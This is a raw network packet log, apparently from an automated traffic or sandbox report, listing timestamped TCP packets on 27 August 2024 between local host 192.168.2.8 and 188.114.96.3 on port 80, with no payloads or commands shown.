                                Aug 27, 2024 09:49:39.325026035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325026035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325032949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325042963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325047016 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325053930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325066090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325071096 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325074911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325086117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325092077 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325098991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325110912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325120926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325129986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325139046 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325155020 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325368881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325387001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325398922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325411081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325421095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325423956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325432062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325443983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325453997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325464964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325464964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325475931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325483084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325486898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325498104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325501919 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325509071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325536966 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325558901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325683117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325694084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325705051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325716019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325727940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325737953 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325740099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325753927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325764894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325777054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325781107 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325787067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325812101 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325928926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325939894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325953007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325963020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325973988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325984001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325990915 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.325995922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325998068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.326014042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326025963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326030016 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.326036930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326046944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326059103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326069117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326080084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326088905 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.326091051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326102018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326112986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326123953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326134920 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.326152086 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.326237917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326257944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326270103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326281071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326282978 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.326292038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326302052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326307058 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.326313972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326324940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.326339960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.326383114 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.410623074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410636902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410648108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410691977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410701990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410716057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410717010 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.410727978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410748959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410761118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410769939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410778999 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.410780907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410794020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410799980 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.410824060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.410844088 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.410870075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410881996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410892963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410919905 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.410955906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410967112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410979033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410990000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.410996914 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411000967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411021948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411041975 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411144972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411155939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411166906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411178112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411187887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411200047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411211014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411220074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411220074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411221027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411232948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411250114 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411281109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411304951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411315918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411325932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411354065 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411380053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411381960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411391973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411402941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411417007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411427975 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411427975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411439896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411451101 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411483049 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411542892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411555052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411564112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411580086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411591053 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411592007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411602020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411612988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411638975 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411674976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411685944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411689997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411695004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411705971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411715984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411731005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411736965 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411763906 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411772966 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411799908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411812067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411820889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411843061 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.411957026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411969900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411978960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411983967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.411994934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412004948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412008047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412018061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412019014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412030935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412040949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412046909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412053108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412067890 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412077904 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412319899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412331104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412342072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412353039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412364006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412368059 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412374973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412384033 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412385941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412399054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412410021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412410975 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412420988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412425041 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412432909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412441969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412447929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412458897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412460089 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412472010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412489891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412491083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412502050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412512064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412522078 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412524939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412534952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412559986 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412750959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412761927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412771940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412782907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412794113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412798882 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412805080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412816048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412827969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412831068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412841082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412851095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412851095 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412863016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.412868023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.412889957 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.413067102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413077116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413091898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413104057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413115025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413115025 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.413126945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413155079 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.413167953 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.413281918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413292885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413301945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413311958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413325071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413341045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413341999 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.413352013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413361073 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.413361073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413372993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413383961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413393974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413403034 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.413404942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413415909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413428068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413428068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.413438082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413449049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413461924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.413464069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.413491964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.413512945 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.497592926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497602940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497612953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497678041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497688055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497689009 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.497698069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497706890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497725964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.497728109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497739077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497765064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.497781992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.497807980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497817993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497823000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497828007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497853994 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.497900009 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.497937918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497948885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497957945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497967958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497977018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497982979 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.497987986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.497998953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498008966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498019934 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498050928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498073101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498087883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498104095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498114109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498121977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498128891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498136044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498146057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498147011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498172998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498197079 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498250961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498260975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498275042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498287916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498313904 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498348951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498420000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498430967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498440027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498450041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498460054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498471975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498478889 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498481989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498492002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498502970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498509884 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498512983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498526096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498529911 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498548031 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498554945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498564959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498594046 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498691082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498702049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498708963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498718977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498729944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498733044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498739958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498749018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498759031 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498761892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498769045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498776913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498790026 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498807907 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498831987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.498876095 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.498986959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499000072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499011040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499021053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499031067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499034882 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.499041080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499049902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499061108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499070883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.499072075 CEST4971580192.168.2.8188.114.96.3
